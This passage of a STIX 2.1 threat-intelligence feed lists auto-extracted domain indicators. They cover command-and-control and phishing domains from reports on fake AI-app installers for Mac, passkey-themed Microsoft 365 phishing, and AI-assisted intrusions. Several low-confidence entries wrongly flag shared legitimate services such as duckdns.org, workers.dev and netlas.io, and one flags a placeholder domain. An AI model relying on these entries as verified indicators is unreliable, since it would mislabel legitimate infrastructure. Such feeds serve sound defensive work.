42","url":"https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--31eb6c3d-d17e-41cd-83a1-38cac1020582","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: asia.newsinweb.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: drivinguber.com Primary command-and-control host C2 domain asia.newsinweb.com Regional fallback command-and-control host C2 domain usa.ne","pattern":"[domain-name:value = 'asia.newsinweb.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b7c5226-8850-484f-a83b-ee1f6fcc7e6a","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: drivinguber.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: ist Possible renamed LaunchAgent persistence file C2 domain drivinguber.com Primary command-and-control host C2 domain asia.newsinweb.c","pattern":"[domain-name:value = 'drivinguber.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1fd1b453-63d7-478a-99db-15a2f49f23f3","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: newsinweb.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: m Regional fallback command-and-control host C2 root domain newsinweb.com Root domain used for fallback infrastructure Download URI /","pattern":"[domain-name:value = 'newsinweb.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6dee3c31-3bc6-48d7-b826-2f7b734d069c","created":"2026-09-10T09:53:52.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: usa.newsinweb.com","description":"Seen in \"Hackers Use Fake Claude and ChatGPT Installers to Infect Mac Users With Password-Stealing Malware\" (Cyber Security News). Context: eb.com Regional fallback command-and-control host C2 domain usa.newsinweb.com Regional fallback command-and-control host C2 root domain n","pattern":"[domain-name:value = 'usa.newsinweb.com']","pattern_type":"stix","valid_from":"2026-09-10T09:53:52.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/fake-claude-and-chatgpt-installers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8d965ee3-96dc-4f13-9fae-80860cb35a85","created":"2026-09-10T09:51:44.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: clck.ru","description":"Seen in \"Fake GTA 6 download delivers malware-packed bundle to impatient gamers\" (Help Net Security). Context: t file then launches Microsoft Edge and connects to https://clck[.]ru/34uJnp, where it confirms that it has an internet connect","pattern":"[domain-name:value = 'clck.ru']","pattern_type":"stix","valid_from":"2026-09-10T09:51:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/10/fake-gta-6-downloads-malware-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--00518f56-ca83-43cc-a2f1-91b0433c22bc","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: add-passkey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: helpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[.]com. The operator","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9745be09-cb06-4f9f-8934-8cb022f0d146","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: contoso.add-passkey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: e operators commonly use organization-specific URLs such as contoso[.]add-passkey[.]com, which makes the fraudulent destination appear more cre","pattern":"[domain-name:value = 'contoso.add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e5b3a7c8-f35f-4dd8-81a0-bc389d55b37c","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: integratedsso.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[.]com. The operators commonly use organi","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--66af648f-3572-43d7-83d0-381117815afe","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: keysyncos.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ins SSO oktasession[.]com Domains Identity-provider session keysyncos[.]com Domains Key synchronization Note: IP addresses and domain","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--af4958a1-4173-49b7-8e18-cc9103d45e1d","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oktasession.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[.]com. The operators commonly use organization-specific URLs su","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--96aef201-6008-4588-b0ac-c58daeccdd46","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: passkeyhelpdesk.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: subdomain. Examples of observed lure infrastructure include passkeyhelpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[","pattern":"[domain-name:value = 'passkeyhelpdesk.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--77e2a1a7-e72d-4beb-97fe-8ff468daf66e","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: secure-passkey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: observed lure infrastructure include passkeyhelpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.","pattern":"[domain-name:value = 'secure-passkey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--41217922-724d-41ec-bf05-26106719f0f9","created":"2026-09-10T09:19:40.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: setupmypasskey.com","description":"Seen in \"Hackers Pose as IT Support to Hijack Microsoft 365 Accounts With Fake Passkey Alerts\" (GBHackers). Context: ucture include passkeyhelpdesk[.]com, secure-passkey[.]com, setupmypasskey[.]com, add-passkey[.]com, integratedsso[.]com, and oktasession[","pattern":"[domain-name:value = 'setupmypasskey.com']","pattern_type":"stix","valid_from":"2026-09-10T09:19:40.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/microsoft-365-accounts-hijacked/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b90eddf1-f89f-4dfe-8f10-62fac101f0eb","created":"2026-09-10T08:06:02.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: duckdns.org","description":"Seen in \"Hackers Use Claude and GPT-Powered Tools to Help Breach Government and Financial Networks\" (Cyber Security News). Context: d for data exfiltration troubleshooting Domain m-doxa-apodo.duckdns[.]org Mexican campaign infrastructure domain Domain m-doxa-geo.","pattern":"[domain-name:value = 'duckdns.org']","pattern_type":"stix","valid_from":"2026-09-10T08:06:02.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/gpt-powered-tools/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e425d47-2e1f-4386-aa7c-8def6e78a156","created":"2026-09-10T06:02:43.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: duckdns.org","description":"Seen in \"Hackers Use LLMs to Generate Exploit Scripts and Automate Post-Exploitation Across Latin America\" (GBHackers). Context: cate SHA-256 Fingerprint Corresponding Host/IP m-doxa-apodo.duckdns[.]org 46ac289ce0c13666de616446f5d5a68da8bd150f4f065c3bec02f6377","pattern":"[domain-name:value = 'duckdns.org']","pattern_type":"stix","valid_from":"2026-09-10T06:02:43.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/llm-powered-cyberattacks/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c2c8c79a-2dd9-44db-b0d5-c9c54f13c5e5","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: netlas.io","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: Cut software and an Active Directory server. They also used Netlas.io to compile lists of potential targets. After validating the","pattern":"[domain-name:value = 'netlas.io']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f3b686e6-7e76-4143-9ab3-8b7886d88d18","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: attcdn.com","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: om Domain TA412 delivery and download domain September 2026 attcdn[.]com Domain TA412 delivery and download domain September 2026","pattern":"[domain-name:value = 'attcdn.com']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--745ff920-cb6a-45f7-bd4a-9bb494df7c53","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: msbenefit.com","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: .]com Domain TA412 delivery and download domain August 2026 msbenefit[.]com Domain TA412 delivery and download domain September 2026","pattern":"[domain-name:value = 'msbenefit.com']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--133ec735-368f-4c7b-a706-5622bfc9a539","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: secboxes.com","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: 26c17b2d09d56848893f9d98ee SHA256 background.js August 2026 secboxes[.]com Domain TA412 delivery and download domain August 2026 msb","pattern":"[domain-name:value = 'secboxes.com']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a83b2816-7759-4173-b3ef-4663cb4d7226","created":"2026-09-10T05:15:03.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: workers.dev","description":"Seen in \"China-Linked Hackers Exploit Chrome and Windows Zero-Days in BlueMoon Attacks\" (GBHackers). Context: d URL August 2026 extension-management-portal.centerfjdr658.workers[.]dev Hostname GemStone browser extension C&C August 2026 exten","pattern":"[domain-name:value = 'workers.dev']","pattern_type":"stix","valid_from":"2026-09-10T05:15:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/china-linked-hackers-exploit-chrome-and-windows-zero-days/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--05a1db2f-6a6f-4416-93b3-164b786a1b82","created":"2026-09-10T05:00:14.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: bloom.io","description":"Seen in \"Cybercriminals are building phishing pages that exist only inside victims’ browsers\" (Help Net Security). Context: s. Teams loads a resource hosted on an external domain, cdn.bloom[.]io, which ultimately results in the phishing page being rend","pattern":"[domain-name:value = 'bloom.io']","pattern_type":"stix","valid_from":"2026-09-10T05:00:14.000Z","labels":["auto-extracted","phishing-fraud"],"confidence":30,"external_references":[{"source_name":"Help Net Security","url":"https://www.helpnetsecurity.com/2026/09/10/browser-based-phishing-blob-urls-microsoft-oauth/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--53ac0681-111c-4fd8-a30e-1fc68f22bd6e","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: add-passkey.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: lpdesk[.]com, secure-passkey[.]com†, setupmypasskey[.]com†, add-passkey[.]com† SSO and identity provider integratedsso[.]com†, oktasess","pattern":"[domain-name:value = 'add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e88d1fd0-53a2-450c-8a11-f7505c5de7b4","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: companyname.maliciousdomain.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: uman trust. The actor creates domains following the pattern companyname[.]maliciousdomain[.]com to impersonate organization-specific authentication por","pattern":"[domain-name:value = 'companyname.maliciousdomain.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3849c560-1358-461d-a65e-a3c64032f4f0","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: contoso.add-passkey.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: can persuade users to proceed with authentication. Example: contoso[.]add-passkey[.]com . The me Domain examples, defanged Passkey passkeyhelpd","pattern":"[domain-name:value = 'contoso.add-passkey.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--29265402-686d-4f37-bee8-e3bccd7384ac","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: integratedsso.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: trar involvement in the activity. For example, company-name.integratedsso[.]com and company-name.secure-passkey[.]com illustrate how the","pattern":"[domain-name:value = 'integratedsso.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ed695cc-baee-4bab-b189-d4b448fd154f","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: keysyncos.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: sso[.]com†, oktasession[.]com Key setup and synchronization keysyncos[.]com, oskeysync[.]com, oskeysetup[.]com, oskeyregister[.]com,","pattern":"[domain-name:value = 'keysyncos.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0ef71fc7-eee6-4e1b-a670-aeabecf116c5","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: myconnectkey.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: om, oskeysetup[.]com, oskeyregister[.]com, syncmykey[.]com, myconnectkey[.]com, oskeyconnect[.]com Setup and verification validationsetu","pattern":"[domain-name:value = 'myconnectkey.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--15edcf78-47f8-4dd1-840f-120114ad6180","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oktasession.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: skey[.]com† SSO and identity provider integratedsso[.]com†, oktasession[.]com Key setup and synchronization keysyncos[.]com, oskeysync[","pattern":"[domain-name:value = 'oktasession.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--27ccc6d1-3c6b-4f74-b2c9-d9ddcfcc6273","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeyconnect.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: , oskeyregister[.]com, syncmykey[.]com, myconnectkey[.]com, oskeyconnect[.]com Setup and verification validationsetupac[.]com, portalset","pattern":"[domain-name:value = 'oskeyconnect.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--917c9a7f-3d3d-4ecc-9d90-8c6ad8bd95cf","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeyregister.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: ization keysyncos[.]com, oskeysync[.]com, oskeysetup[.]com, oskeyregister[.]com, syncmykey[.]com, myconnectkey[.]com, oskeyconnect[.]com","pattern":"[domain-name:value = 'oskeyregister.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae00ab71-53dc-461a-b9c2-d0b732f7d1fa","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeysetup.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: setup and synchronization keysyncos[.]com, oskeysync[.]com, oskeysetup[.]com, oskeyregister[.]com, syncmykey[.]com, myconnectkey[.]com","pattern":"[domain-name:value = 'oskeysetup.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2bc3ac85-96f2-4ccb-bde4-5e287d929e64","created":"2026-09-09T17:41:18.000Z","modified":"2026-09-15T22:16:24.403Z","created_by_ref":"identity--17e66e4e-0547-4b63-b732-0da774375549","name":"domain: oskeysync.com","description":"Seen in \"Passkey-themed social engineering leads to identity and cloud compromise\" (Microsoft Security Blog). Context: ession[.]com Key setup and synchronization keysyncos[.]com, oskeysync[.]com, oskeysetup[.]com, oskeyregister[.]com, syncmykey[.]com,","pattern":"[domain-name:value = 'oskeysync.com']","pattern_type":"stix","valid_from":"2026-09-09T17:41:18.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Microsoft Security Blog","url":"https://www.microsoft.com/en-us/security/blog/2026/09/09/passkey-themed-social-engineering-leads-identity-cloud-compromise/"}]}]}